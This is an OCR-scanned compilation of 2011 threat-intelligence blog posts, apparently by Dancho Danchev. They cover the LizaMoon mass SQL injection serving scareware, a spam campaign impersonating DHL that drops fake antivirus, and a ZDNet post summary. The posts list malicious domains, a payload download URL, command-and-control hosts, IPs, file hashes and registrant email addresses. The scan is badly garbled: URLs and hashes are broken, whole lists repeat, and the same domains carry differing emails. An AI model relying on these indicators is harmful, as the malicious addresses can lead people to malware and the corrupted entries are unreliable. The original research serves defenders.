movie-xbtb.in - Email: sanfordross9242@gmail.com 
movie-xxnl.in - Email: ianbalitsaris3201@gmail.com 
softway2011.com - Email: contact@privacyprotect.org 
system-scanner-boep.co.cc 

system-scanner-eill.co.cc 

system-scanner-eopa.co.cc 

system-scanner-ewqq.co.cc 

system-scanner-iaap.co.cc 

system-scanner-ieyx.co.cc 

system-scanner-Icyo.co.cc 
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system-scanner-ouny.co.cc 
system-scanner-oypx.co.cc 
system-scanner-qeap.co.cc 
system-scanner-racv.co.cc 
system-scanner-ryes.co.cc 
system-scanner-tzii.co.cc 
system-scanner-uemo.co.cc 
system-scanner-uotu.co.cc 
system-scanner-uyxt.co.cc 
system-scanner-vpoo.co.cc 
system-scanner-xtoi.co.cc 
system-scanner-yoyx.co.cc 
system-scanner-ytut.co.cc 


Rotated scareware domains involved in the campaign, responding to 
(AS6739; ONO-AS Cableuropa - ONO): 

defender-thga.in - Email: youngantonio6055@gmail.com 
defender-waqga.in - Email: christodoulosglidden8856@gmail.com 
defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-rlob.in - Email: vasikaranfreudenburg2690@gmail.com 
defender-abcc.in - Email: rubysmart5057@gmail.com 
defender-pakc.in - Email: sabrinawheelock7642@gmail.com 
defender-keod.in - Email: knhashayarbirss4814@gmail.com 
defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-qumf.in - Email: rachelalobal891@gmail.com 
defender-fmof.in - Email: kamillamartinl1237@gmail.com 
defender-uvag.in - Email: espenkeck7682@gmail.com 
defender-hsug.in - Email: moniquetkarnopp3596@gmail.com 
defender-vxgh.in - Email: griseldavelez5369@gmail.com 
defender-Icoh.in - Email: timothythomas6924@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 
defender-osbi.in - Email: fidelslattum2159@gmail.com 
defender-wbui.in - Email: carlosbuntschu1238@gmail.com 
defender-vimj.in - Email: lauriefreeman9930@gmail.com 
defender-hjlk.in - Email: lauriefreeman9930@gmail.com 
defender-endl.in - Email: adamgaylard1113@gmail.com 
defender-jgnl.in - Email: caseyalzen3316@gmail.com 
defender-iksl.in - Email: marasanders9974@gmail.com 
defender-labm.in - Email: gregorybradford1520@gmail.com 
defender-rrin.in - Email: kKevincharoenset5321@gmail.com 
defender-sxin.in - Email: taloupavlinovich7 166@gmail.com 
defender-cron.in - Email: lisasuresh9147@gmail.com 
defender-vqgqn.in - Email: chrisjames4421@gmail.com 
defender-dteo.in - Email: giovannaraggio5417@gmail.com 
defender-ugko.in - Email: christinakaaikati5574@gmail.com 
defender-qpwo.in - Email: carlaadams@gmail.com 
defender-atxo.in - Email: celineiebba9266@gmail.com 
defender-rlfp.in - Email: latanyamuscatell9507@gmail.com 
defender-vflq.in - Email: terriacuna2081@gmail.com 
defender-eklq.in - Email: sebastiensheppard8680@gmail.com 


84.123.115.228 
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defender-ddbr.in - Email: selenajohansson9195@gmail.com 
defender-ojbr.in - Email: fucknielsen8675@gmail.com 
defender-drnr.in - Email: sumanvcasquez2008@gmail.com 
defender-nrpr.in - Email: burtonalba8156@gmail.com 
defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 
defender-grlit.in - Email: anthonygaylard9887@gmail.com 
defender-hmfu.in - Email: lynnbone8026@gmail.com 
defender-htlu.in - Email: jerihamann4163@gmail.com 
defender-aabv.in - Email: leonflanagan7681@gmail.com 
defender-ppdw.in - Email: divinakempton5670@gmail.com 
defender-wrhw.in - Email: bradsureshl1406@gmail.com 
defender-wkiw.in - Email: otisvaladez7778@gmail.com 
defender-hipw.in - Email: angiejohansen9730@gmail.com 
defender-qfdx.in - Email: hokyeongyancey6369@gmail.com 
defender-xnnx.in - Email: sylviawulff2140@gmail.com 
defender-xkox.in - Email: ryanmartin7607@gmail.com 


The scareware domains have been registered using automatically registered email ac- 
counts at Gmail, as a precaution in an attempt to make it harder to expose the campaign by 
using a single email only. 


Monitoring of the campaign is ongoing. 


Related posts: 


¢ [6]SQL Injection Through Search Engines Reconnaissance 

¢ [7]Massive SQL Injections Through Search Engine’s Reconnaissance - Part Two 
¢ [8]Massive SQL Injection Attacks - the Chinese Way 

¢ [9]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 

¢ [10]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 

¢ [11]Dissecting the WordPress Blogs Compromise at Network Solutions 

e [12]Yet Another Massive SQL Injection Spotted in the Wild 

¢ [13]Smells Like a Copycat SQL Injection In the Wild 

¢ [14]Fast-Fluxing SQL Injection Attacks 

¢ [15]Obfuscating Fast-fluxed SQL Injected Domains 


This post has been reproduced from [16]Dancho Danchev’s blog. 


http: //ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 
ttp://ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines.htm 
ttp://ddanchev. blogspot .com/2009/04/massive-sql-injections-through-search.htm 


PUN 


http: //community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-1lizamoon-mass-injection.aspx 
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5. http://www.virustotal.com/file-scan/report .html?id=cd902b92042435c2d70d4bf£59acc2de8229bf c367626961f76c03f 


5dcd7e95c- 1301586582 


6. http: //ddanchev. blogspot . com/2007/07/sql- injection-through-search-engines .htm 


7. http://ddanchev. blogspot . com/2009/04/massive-sql-injections-through-search. html 
8. http: //ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 


9. http: //ddanchev.blogspot .com/2010/07/cybercriminals-sql-inject-cybercrime.htm 


10. http://ddanchev. blogspot .com/2010/04/godaddys-mass-wordpress-blogs .htm 
11. http://ddanchev. blogspot .com/2010/04/dissecting-wordpress-blogs- compromise .htm 


12. http://ddanchev. blogspot .com/2008/05/yet-another-massive-sql-injection. htm 
13. http://ddanchev. blogspot .com/2008/07/smells-like-copycat-sql-injection-in.htm 
14. http://ddanchev. blogspot .com/2008/05/fast-fluxing-sql-injection-attacks.htm 


15. http: //ddanchev. blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected.htm 
16. http://ddanchev. blogspot .com/ 


7.3.12 Dissecting the Massive SQL Injection Attack Serving Scareware 
(2011-03-31 19:54) 


Potential threat details 


Microsoft Security Essentials detected potential threats that might compromise your privacy or damage your 
computer. Your access to these items may be suspended until you take an action. Click ‘Show details’ to learn 


more, 
Detected items 4lert level Recommendation Status 
© Unknown Win32/Trojan Severe Remove Suspended 


Category: Trojan 
Description: This program is dangerous and execute commands from an attacker. 


Recommendation: Remove this software immediately, 


Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer. 
You can still access the files that these programs use without removing them (not recommended), To access 
these files, select the 'Clean computer’ action and click ‘Apply action’. IF this option is not available, 

log on as administrator or ask the local administrator for help. 


Items: 
C:\windows\system32\cmd.exe 


Clean computer | Apply actions | Close | 
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A currently ongoing massive SQL injection attack has affected hundreds of thousands of 
web pages across the Web, to ultimately monetize the campaign through a scareware affiliate 
program. Such massive SQL injection attempts are usually conducted using [1]mass vulnera- 
bility scanning tools, with the help of [2]search engines which have already [3]crawled the 
vulnerable sites. 


What’s particularly interesting about this campaign, is the fact that the used domains 
are all responding to the same IPs, including the portfolios of scareware domains, which the 
cybercriminals naturally rotate on a periodic basis. Let’s dissect the campaign, expose the 
domain portfolios and the entire campaign structure. 


UPDATED: Related SQL injected URLs [4]courtsesy of WebSense: 
online-stats201.info/ur.php - Email: tikOO66@gmail.com 
stats-master111.info/ur.php - Email: tikOO066@gmail.com 
agasi-story.info/ur.php - 91.217.162.45 - Email: tikO066@gmail.com 
general-st.info/ur.php - Email: tikOO66@gmail.com 
extra-service.info/ur.php - Email: tikOO66@gmail.com 
sol-stats.info/ur.php - Email: tikO066@gmail.com 
google-stats49.info/ur.php - Email: tikO066@gmail.com 
google-stats45.info/ur.php - Email: tikO066@gmail.com 
google-stats50.info/ur.php - Email: tikO066@gmail.com 
google-server43.info/ur.php - Email: tikOO66@gmail.com 
stats-master88.info/ur.php - Email: tikOO66@gmail.com 
eva-marine.info/ur.php - 109.236.81.28 - Email: tikOO66@gmail.com 
stats-master99.info/ur.php - Email: tikOO066@gmail.com 
tzv-stats.info/ur.php - Email: tikOO66@gmail.com 


milapop.com/urphp - Email: jamesnorthone@hotmailbox.com 
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SQL injected URLs: 


lizamoon.com/ur.php (67,500 results) - 91.220.35.151 (AS3721); 91.213.29.182 (AS51786); 
95.64.9.18 (AS50244) - Email: jamesnorthone@hotmailbox.com 


alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com 
alisa-carter.com/ur.php (220,000 results) - Email: jamesnorthone@hotmailbox.com 
alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com 
t6ryt56.info/ur.php (18 results) - Email: support@ruler-domains.com 
tadygus.com/ur.php (100 results) - Email: jamesnorthone@hotmailbox.com 


worid-of-books.com/ur.php (334,000 results) - Email: tikO0O66@gmail.com 


System Tasks 


[a) View system information (> 
3D Add or remove prograsrs wane 
J 39 worms 
GB change a settings 
Other Places «> _ 
wd Local Disk (C:) Local Disk (D:) 
€Q My Network Places @ 34 worms @ 17 trojans 


&) My Documents pvp 
(© Shared Documents i 
GB Control Panel 


Now scanning: nnensryc.exe 
‘< Your Computer is Infected! 
Name Risk level Date Files tected State ja] 
@ Email-Worm.win32.Net Critical 24 APR 2010 42 Wasting removal 
@ Email-Wormwin32Myd — Critical 26 OCT 2010 20 Waiting removal 
@ Trj-Dwenidr.win Critical FEB 7 Waiting removal 
Description: - 
This program is potertially dangerous for your system. Trojan-Downloader stesing passwords, credit cards and other personal |p| 
information from your computer, 4 
Advice: 


You need to remove this threst 2s soon as possible! 


Upon successful redirection, the campaign attempts to load the scareware domains defender- 
nibea.in/scan1b/237 - 46.252.130.200 - Email: jimwei2969@gmail.com 
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Detection rate: 

freesystemscan.exe - [5]Trojan/Win32.FakeAV - Result: 9/ 41 (22.0 %) 
MD5 : 815d77f8fca509ddelabeafabed30b65 

SHA1 : 1b3c35afb76c53cd9507fffee46fb58c29e72bc1 


SHA256: cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03F75dcd7e95c 


Responding to 46.252.130.200 (AS25190; KIS-AS UAB "Kauno Interneto Sistemos") are also: 
antivirus-1091.co.cc 
antivirus-1574.co.cc 
antivirus-2051.co.cc 
antivirus-2525.co.cc 
antivirus-2932.co.cc 
antivirus-3654.co.cc 
antivirus-3833.co.cc 
antivirus-4063.co.cc 
antivirus-418.co.cc 
antivirus-4303.co.cc 
antivirus-4749.co.cc 
antivirus-495.co.cc 
antivirus-5216.co.cc 
antivirus-5676.co.cc 


antivirus-5802.co.cc 
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antivirus-6437.co.cc 

antivirus-6703.co.cc 

antivirus-7081.co.cc 

antivirus-713.co.cc 

antivirus-728.co.cc 

antivirus-7357.co.cc 

antivirus-8072.co.cc 

antivirus-9009.co.cc 

antivirus-9638.co.cc 

antivirus-9667.co.cc 

defender-aabv.in - Email: leonflanagan7681@gmail.com 
defender-aqeu.co.cc 

defender-asng.co.cc 

defender-atio.in - Email: terriduverger3239@gmail.com 
defender-atxo.in - Email: celineiebba9266@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 
defender-bwuy.co.cc 

defender-cron.in - Email: lisasuresh9147@gmail.com 
defender-ddbr.in - Email: selenajohansson9195@gmail.com 
defender-dteo.in - Email: giovannaraggio5417@gmail.com 
defender-eahy.co.cc 

defender-eklq.in - Email: sebastiensheppard8680@gmail.com 
defender-endl.in - Email: adamgaylard1113@gmail.com 
defender-ewum.co.cc 


defender-eyde.co.cc 
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defender-fmof.in - Email: kamillamartinl1237@gmail.com 
defender-fola.co.cc 

defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-grlit.in - Email: anthonygaylard9887@gmail.com 
defender-hipw.in - Email: angiejohansen9730@gmail.com 
defender-hjlk.in - Email: jennwrayford2124@gmail.com 
defender-hmfu.in - Email: lynnbone8026@gmail.com 
defender-hsug.in - Email: moniquetkarnopp3596@gmail.com 
defender-htlu.in - Email: jerihamann4163@gmail.com 
defender-iibk.co.cc 

defender-iies.co.cc 


defender-iksl.in - Email: amarasanders9974@gmail.com 
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antivirl.mooo.com 
antivirus-2932.co.cc 
defender-ayva.co.cc 
defender-qotg.in 
defender-uvag.in 
defender-vqqn.in 
detender-wrhw.in 
exirzexl.co.ce 
mxddtipp.co.cc 
pzecsfas.co.cc 
system-scanner-iwew.co.cc 
zipeqbhp.co.cc 


Zivtwtwl.co.ce 


defender-isde.co.cc 


defender-iyrc.co.cc 


A 


46.252.130.200 NET 46.252.130.0/23 ——4S-ge 4s25190 


defender-jgnl.in - Email: caseyalzen3316@gmail.com 


defender-jihv.co.cc 


defender-keod.in - Email: khashayarbirss4814@gmail.com 


defender-kuts.in - Email: rogerfrancis3322@gmail.com 


defender-kwwh.in - Email: tobyboisseau6505@gmail.com 


defender-kzwu.co.cc 
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defender-labm.in - Email: gregorybradford1520@gmail.com 
defender-Icoh.in - Email: timothythomas6924@gmail.com 
defender-nhei.co.cc 

defender-nrpr.in - Email: burtonalba8156@gmail.com 
defender-ojbr.in - Email: fucknielsen8675@gmail.com 
defender-osbi.in - Email: fidelslattum2159@gmail.com 
defender-pakc.in - Email: sabrinawheelock7642@gmail.com 
defender-ppdw.in - Email: divinakempton5670@gmail.com 
defender-qfdx.in - Email: hokyeongyancey6369@gmail.com 
defender-qotg.in - Email: franchescaili9704@gmail.com 
defender-qpwo.in - Email: carlaadams@gmail.com 
defender-qsko.co.cc 

defender-qumf.in - Email: carlaadams@gmail.com 
defender-rlag.in - Email: carmichaelmail@gmail.com 
defender-rrin.in - Email: kevincharoenset5321@gmail.com 
defender-thga.in - Email: youngantonio6055@gmail.com 
defender-ueuv.co.cc 

defender-uqko.in - Email: christinakaaikati55 74@gmail.com 
defender-vflq.in - Email: terriacuna2081@gmail.com 
defender-vimj.in - Email: lauriefreeman9930@gmail.com 
defender-vqqn.in - Email: chrissames4421@gmail.com 
defender-vxgh.in - Email: griseldavelez5369@gmail.com 
defender-wkiw.in - Email: otisvaladez7778@gmail.com 
defender-waga.in - Email: christodoulosglidden8856@gmail.com 


defender-wrhw.in - Email: bradsureshl1406@gmail.com 
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defender-wtln.co.cc 

defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-xnnx.in - Email: pavelmayer4891@gmail.com 
defender-ykym.co.cc 

movie-iirg.in - Email: misslynn8546@gmail.com 
movie-pblv.in - Email: judgewright4021@gmail.com 
movies-live-tube-jeyq.co.cc 

movie-tkhk.in - Email: terrymeallyl1288@gmail.com 
movie-tube-beym.co.cc 

movie-tube-juie.co.cc 

movie-ueep.in - Email: celinekevin6179@gmail.com 
movieway2011.com - Email: contact@privacyprotect.org 
movie-xbtb.in - Email: sanfordross9242@gmail.com 
movie-xxnl.in - Email: ianbalitsaris3201@gmail.com 
softway2011.com - Email: contact@privacyprotect.org 
system-scanner-boep.co.cc 

system-scanner-eill.co.cc 

system-scanner-eopa.co.cc 
system-scanner-ewqq.co.cc 
system-scanner-iaap.co.cc 

system-scanner-ieyx.co.cc 

system-scanner-Icyo.co.cc 

system-scanner-ouny.co.cc 
system-scanner-oypx.co.cc 


system-scanner-qeap.co.cc 
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system-scanner-racv.co.cc 
system-scanner-ryes.co.cc 
system-scanner-tzii.co.cc 
system-scanner-uemo.co.cc 
system-scanner-uotu.co.cc 
system-scanner-uyxt.co.cc 
system-scanner-vpoo.co.cc 
system-scanner-xtoi.co.cc 
system-scanner-yoyx.co.cc 


system-scanner-ytut.co.cc 


Rotated scareware domains involved in the campaign, responding to 
(AS6739; ONO-AS Cableuropa - ONO): 


defender-thga.in - Email: youngantonio6055@gmail.com 
defender-waqga.in - Email: christodoulosglidden8856@gmail.com 
defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-rlob.in - Email: vasikaranfreudenburg2690@gmail.com 
defender-abcc.in - Email: rubysmart5057@gmail.com 
defender-pakc.in - Email: sabrinawheelock7642@gmail.com 
defender-keod.in - Email: khashayarbirss4814@gmail.com 
defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-qumf.in - Email: rachelalbal891@gmail.com 
defender-fmof.in - Email: kamillamartinl237@gmail.com 
defender-uvag.in - Email: esoenkeck7682@gmail.com 


defender-hsug.in - Email: moniquetkarnopp3596@gmail.com 
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84.123.115.228 


defender-vxgh.in - Email: griseldavelez5369@gmail.com 
defender-Icoh.in - Email: timothythomas6924@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 
defender-osbi.in - Email: fidelslattum2159@gmail.com 
defender-wbui.in - Email: carlosbuntschu1238@gmail.com 
defender-vimj.in - Email: lauriefreeman9930@gmail.com 
defender-hjlk.in - Email: lauriefreeman9930@gmail.com 
defender-endl.in - Email: adamgaylard1113@gmail.com 
defender-jgnl.in - Email: caseyalzen3316@gmail.com 
defender-iksl.in - Email: marasanders9974@gmail.com 
defender-labm.in - Email: gregorybradford1520@gmail.com 
defender-rrin.in - Email: kevincharoenset5321@gmail.com 
defender-sxin.in - Email: taloupavlinovich7166@gmail.com 
defender-cron.in - Email: lisasuresh9147@gmail.com 
defender-vqqn.in - Email: chrisjames4421@gmail.com 
defender-dteo.in - Email: giovannaraggio5417@gmail.com 
defender-ugko.in - Email: christinakaaikati5574@gmail.com 
defender-qpwo.in - Email: carlaadams@gmail.com 
defender-atxo.in - Email: celineiebba9266@gmail.com 
defender-rlfp.in - Email: latanyamuscatell9507@gmail.com 
defender-vflq.in - Email: terriacuna2081@gmail.com 
defender-eklq.in - Email: sebastiensheppard8680@gmail.com 
defender-ddbr.in - Email: selenajohansson9195@gmail.com 
defender-ojbr.in - Email: fucknielsen8675@gmail.com 


defender-drnr.in - Email: sumanvcasquez2008@gmail.com 
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defender-nrpr.in - Email: burtonalba8156@gmail.com 
defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 
defender-grlit.in - Email: anthonygaylard9887@gmail.com 
defender-hmfu.in - Email: lynnbone8026@gmail.com 
defender-htlu.in - Email: jerihamann4163@gmail.com 
defender-aabv.in - Email: leonflanagan7681@gmail.com 
defender-ppdw.in - Email: divinakempton5670@gmail.com 
defender-wrhw.in - Email: bradsureshl1406@gmail.com 
defender-wkiw.in - Email: otisvaladez7778@gmail.com 
defender-hipw.in - Email: angiejohansen9730@gmail.com 
defender-qfdx.in - Email: hokyeongyancey6369@gmail.com 
defender-xnnx.in - Email: sylviawulff2140@gmail.com 


defender-xkox.in - Email: ryanmartin7607@gmail.com 


The scareware domains have been registered using automatically registered email ac- 
counts at Gmail, as a precaution in an attempt to make it harder to expose the campaign by 
using a single email only. 


Monitoring of the campaign is ongoing. 


Related posts: 


¢ [6]SQL Injection Through Search Engines Reconnaissance 
¢ [7]Massive SQL Injections Through Search Engine’s Reconnaissance - Part Two 
¢ [8]Massive SQL Injection Attacks - the Chinese Way 


¢ [9]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 
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[10]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 


[11]Dissecting the WordPress Blogs Compromise at Network Solutions 


[12]Yet Another Massive SQL Injection Spotted in the Wild 


[13]Smells Like a Copycat SQL Injection In the Wild 


[14]Fast-Fluxing SQL Injection Attacks 


[15]Obfuscating Fast-fluxed SQL Injected Domains 


This post has been reproduced from [16]Dancho Danchev’s blog. 


ttp://ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks- chinese. html 


ttp://ddanchev .blogspot.com/2007/07/sql-injection-through-search-engines .htm 


ttp://community .websense.com/blogs/securitylabs/archive/2011/03/31/update-on-1lizamoon-mass- injection. aspx 


1 
2 
3. http: //ddanchev. blogspot .com/2009/04/massive-sql-injections-through- search. html 
4 
2. 


ttp://ddanchev .blogspot.com/2007/07/sql-injection-through-search-engines .htm 
ttp://ddanchev. blogspot .com/2009/04/massive-sql-injections-through-search. html 
ttp://ddanchev.blogspot.com/2008/10/massive-sql-injection-attacks- chinese. html 


COND 


ttp://ddanchev.blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.htm 


10. 
11 
ttp://ddanchev. blogspot .com/2008/05/yet-another-massive-sql-injection.html 

ttp://ddanchev. blogspot .com/2008/07/smells-like-copycat-sql-injection-in.htm 
. http://ddanchev. blogspot .com/2008/05/fast-fluxing-sql-injection-attacks. html 
15. 
16. 


7.4 April 


7.4.1 Spamvertised DHL Notifications Scareware Campaign (2011-04-04 16:44) 


Yet another currently spamvertised campaign is impersonating DHL for scareware serving 
purposes. 


Sample subjects: DHL notification #random number 
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Sample message: Dear customer! The parcel was send your home address. And it will arrice 
within 7 bussness day. More information and the tracking number are attached in document 
below. Thank you. 2011 DHL International GmbH. All rights reserverd. 

Sample filenames: DHL _tracking.zip; doc.zip; dhl.zip 


Detection rates: 

dhl.exe - [1]Backdoor:Win32/Hostil.gen!A - Result: 22/40 (55.0 %) 

MD5 : 87d778169ae14d934b92ce628b5cfde4 

SHA1 : 20787fde3b7fde64cc3892c4df9a4eb2a2515830 

SHA256: 6b54ff520fa6ff504f5f2f0c33af8b92424f0b538a760f4eb983d76007d3fe54 


Downloads additional binary from puskovayaustanovka.ru/pusk2.exe - 46.161.20.66 - Email: 
admin@puskovayaustanovka.ru 


pusk2.exe - [2]Trojan.Fakealert.20509 - Result: 11/41 (26.8 %) 

MD5 : a9be091eedea947f8626d11042e0d9be 

SHA1 : 9c1d399d47a6ef6081553a101ab48fca61859db4 

SHA256: d4f5802a392c0851d5e19118d56cc8b578f1a07085aa5772cbdcf484608ed094 


Help protect your PC 
XP Total Securit elp fc ec yu 


Security essentials 
Security Center helps you manage your Windows security settings. To help protect your 
computer, make sure the three secunty essentials are marked ON, Ifthe settings are 
* Get the latest secunty and virus not ON, follow the recommendations. To return to the Security Centerlater, open 
information from Microsoft Control Panel. 
What's new in Windows 


@ Resources R 


Perform Scan * Check for the latest updates from 


Windows Update + - 
Firewall © OFF * 
* Get support for security-related 
issues 


XP Total Security 2011 reports that it is currently turned off. A firewall helps protect 
* Geth bout Security Center your computer from potentially harmful content on the internet. Click 
ons eae Recommendations to learn how to fix this problem. 
* Change the way Seaunty Center cad +2 firewall h: rf far’ r 
alerts me 


Proactive Defense 
— %® Automatic Updates @ON ¢ 


F Virus Protection © OFF * 
ba Configuration 


XP Total Security 2011 reports that it is turned off. Antivirus software helps protect 
your computer against viruses and other security threats. Click Recommendations for 
suggested actions you can take, 

w + Virtus soRw 


Firewall 


Activate your copy right now 


and get full real-time protection 
with XP Total Security 2011! Manage security settings for: 


Upon execution phones back to the following domains: 
kynugypenihyf.com - Email: v8@ca4.ru 
cylakydugudi.com - Email: acts@free-id.ru 
fevahanybyvu.com - Email: fs@free-id.ru 
gicyxepomer.com - Email: tabs@yourisp.ru 
bemojewedowigo.com - Email: fs@free-id.ru 
sakafiduzipame.com - Email: build@ca4.ru 
wetotyger.com - Email: acts@free-id.ru 
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kytevaviqopoci.com - Email: fs@free-id.ru 
wamojafadezy.com - Email: kilt@bz3.ru 
tetagyjaj.com - Email: kilt@bz3.ru 
jerakidukojoz.com - Email: wrap@cheapbox.ru 
cixovatywo.com - Email: frenzy@ca4.ru 
jafybobik.com - Email: force@ca4.ru 
nizokatahinery.com - Email: foxy@cheapbox.ru 
cujicaraso.com - Email: beret@ca4.ru 
zuzosahule.com - Email: only@free-id.ru 
gokuzajylot.com - Email: silks@ca4.ru 
jumonevetode.com - Email: silks@ca4.ru 
dafatesomyz.com - Email: zq@bz3.ru 
lukofymela.com - Email: silks@ca4.ru 
jebuponip.com - Email: lost@free-id.ru 
quxovasuced.com - Email: ho@ppmail.ru 
laqoduhisegu.com - Email: shot@bz3.ru 
xyseditacif.com - Email: hart@free-id.ru 
wylyxaqunowy.com - Email: mows@bz3.ru 
qepovexidysopy.com - Email: byob@yourisp.ru 
bebecebyt.com - Email: mows@bz3.ru 
dihemehypuq.com - Email: shot@bz3.ru 
rumesexyzobuz.com - Email: dawn@bz3.ru 
gopilezavyxiro.com - Email: hush@bz3.ru 


hyvijinymut.com/1017000312 - 99.198.114.189 - returns OK 
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cresomyz,.co 
dihemehypug.com 
fevahanybyvu.com . 
gicyxepomer.com 69,50.209,184 
ot.co 204,12.223.173 


99,195.114.100 


ery.com 


vexidysopy.com 


quxovasuced,com 
esexyzobuz.com 


Domains are respoding to the following ASs: AS18866; AS32097: 
quxovasuced.com - 69.50.209.139 
laqoduhisegu.com - 69.50.209.140 
wylyxaqunowy.com - 69.50.209.148 
qepovexidysopy.com - 69.50.209.149 
fevahanybyvu.com - 69.50.209.182 
bemojewedowigo.com - 69.50.209.183 
gicyxepomer.com - 69.50.209.184 
sakafiduzipame.com - 69.50.209.185 
wamojafadezy.com - 69.50.209.186 
kytevaviqopoci.com - 69.50.209.188 
jebuponip.com - 69.50.209.223 
cylakydugudi.com - 69.50.209.224 
wetotyger.com - 69.50.209.225 
nizokatahinery.com - 69.197.161.202 
cujicaraso.com - 69.197.161.203 
kynugypenihyf.com - 69.197.161.204 
jafybobik.com - 69.197.161.205 
tetagyjaj.com - 99.198.114.98 
jerakidukojoz.com - 99.198.114.99 
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gopilezavyxiro.com - 99.198.114.100 
cixovatywo.com - 99.198.114.101 
hyvijinymut.com - 99.198.114.189 
zuzosahule.com - 204.12.223.170 
jumonevetode.com - 204.12.223.171 
dafatesomyz.com - 204.12.223.172 
gokuzajylot.com - 204.12.223.173 
lukofymela.com - 204.12.223.174 
rumesexyzobuz.com - 204.12.223.186 
xyseditacif.com - 204.12.223.187 
dihemehypugq.com - 204.12.223.188 
bebecebyt.com - 204.12.223.189 


Monitoring of the campaign is ongoing. 


Related posts: 

[3]Spamvertised Post Office Express Mail (USPS) Emails Serving Malware 
[4]Spamvertised United Parcel Service notifications serve malware 
[5]Spamvertised FedEx Notifications Spread Malware 

[6]Spamvertised DHL Notification Malware Campaign 

[7]More Spamvertised DHL Notifications Spread Malware 


1 
2. ttp://www.virustotal.com/file-scan/report .html?id=d4f5802a392c0851d5e19118d56cc8b578f 1a07085aa5772cbdcf4 
3. http: //ddanchev blogspot . com/2011/03/spamvertised-post-office-express-mail.html 

4. ictp://ddanchev. blogspot .con/2011/03/spanvertised-united-parcel-service.ntall 

5. http: //ddanchev blogspot . com/2011/03/spamvertised-fedex-notif ications~spread. html 


6. http: //ddanchev. blogspot .com/2011/03/spamvertised-dhl-notificication-malware.htm 


7. http://ddanchev. blogspot .com/2011/03/more-spamvertised-dhl-notifications.htm 
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7.4.2. Summarizing Zero Day’s Posts for March (2011-04-04 18:56) 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for March. You can 
subscribe to my [1]personal RSS feed, [2]Zero Day’s main feed, or follow me on Twitter: 


Recommended reading: 


¢ [3] Dear ISP, it’s time to quarantine your malware-infected customers 


¢ [4] Zombie PC Prevention Bill to make security software mandatory 
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01. [5]Spamvertised You have received a gift from one of our members!’ malware campaign 
02. [6]Report: malicious PDF files becoming the attack vector of choice 

03. [7]Ashton Kutcher’s Twitter account hacked 

04. [8]Google tops comparative review of malicious search results - again 

05. [9]Report: 3 million malvertising impressions served per day 

06. [10]Dear ISP, it’s time to quarantine your malware-infected customers 

07. [11]SpyEye gets new DDoS functionality 

08. [12]Spamvertised DHL notifications lead to malware 

09. [13]Spamvertised FedEx notifications lead to malware 

10. [14]Rustock botnet’s operations disrupted 

11. [15]Malicious Japan quake spam leads to scareware 

12. [16]Spamvertised United Parcel Service notifications lead to malware 

13. [17]Researchers release details on 34 SCADA vulnerabilities 

14. [18]Zombie PC Prevention Bill to make security software mandatory 

15. [19]Spamvertised Post Office Express Mail (USPS) emails lead to malware 
16. [20]New GpCode ransomware encrypts files, demands $125 for decryption 
17. [21]Mass SQL injection attack leads to scareware 


This post has been reproduced from [22]Dancho Danchev’s blog. Follow him 
[23]Jon Twitter. 


ttp://www.zdnet .com/topics/danchotdanchev?o=1kmode=rss&tag=mantle_skin; content 


. http: //feeds.feedburner.com/zdnet/securit 


ttp://www.zdnet.com/blog/security/dear-isp-its-time-to-quarantine-your-malware-infected-customers/6712 


ttp://www.zdnet .com/blog/security/zombie-pc-prevention-bill-to-make-security-software-mandatory/848 


VR WNP 


ttp://www.zdnet .com/blog/security/spamvertised-you-have-received-a-gift-from-one-of-our-members-malware- 


ampaign/8250 


6. http: //www.zdnet .com/blog/security/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/825 


ttp://www.zdnet .com/blog/security/ashton-kutchers-twitter-account-hacked/8280 


7. 
8. http: //www.zdnet .com/blog/security/google-tops-comparative-review-of-malicious-search-results-again/8306 


ttp://www.zdnet.com/blog/security/report-3-million-malvertising-impressions-served-per-day/8319 


ttp://www.zdnet .com/blog/security/dear-isp-its-time-to-quarant ine-your-malware-infected-customers/6712 


11. http://www.zdnet .com/blog/security/spyeye-gets-new-ddos-functionality/8381 


ttp://www.zdnet .com/blog/security/spamvertised-dhl-notifications-lead-to-malware/841 


. http://www.zdnet .com/blog/security/spamvertised-fedex-notifications-lead-to-malware/8452 
14 
ttp://www.zdnet .com/blog/security/malicious- japan-quake-spam-leads-to-scareware/846 
.zdnet .com/blog/security/spamvertised-united-parcel-service-notifications-lead-to-malware/8478 
.zdnet .com/blog/security/researchers-release-details-on-34-scada-vulnerabilities/848 
.zdnet .com/blog/security/zombie-pc-prevention-bill-to-make-security-software-mandatory/848 


http: //www.zdnet .com/blog/security/spamvertised-post-office-express-mail-usps-emails-lead-to-malware/8 


ttp://www.zdnet .com/blog/security/new-gpcode-ransomware-encrypts-files-demands- 125-for-decryption/8505 


ttp://www.zdnet .com/blog/security/mass-sql-injection-attack-leads-to-scareware/8510 


22. http://ddanchev.blogspot.com/ 
23. http://twitter.com/danchodanche 
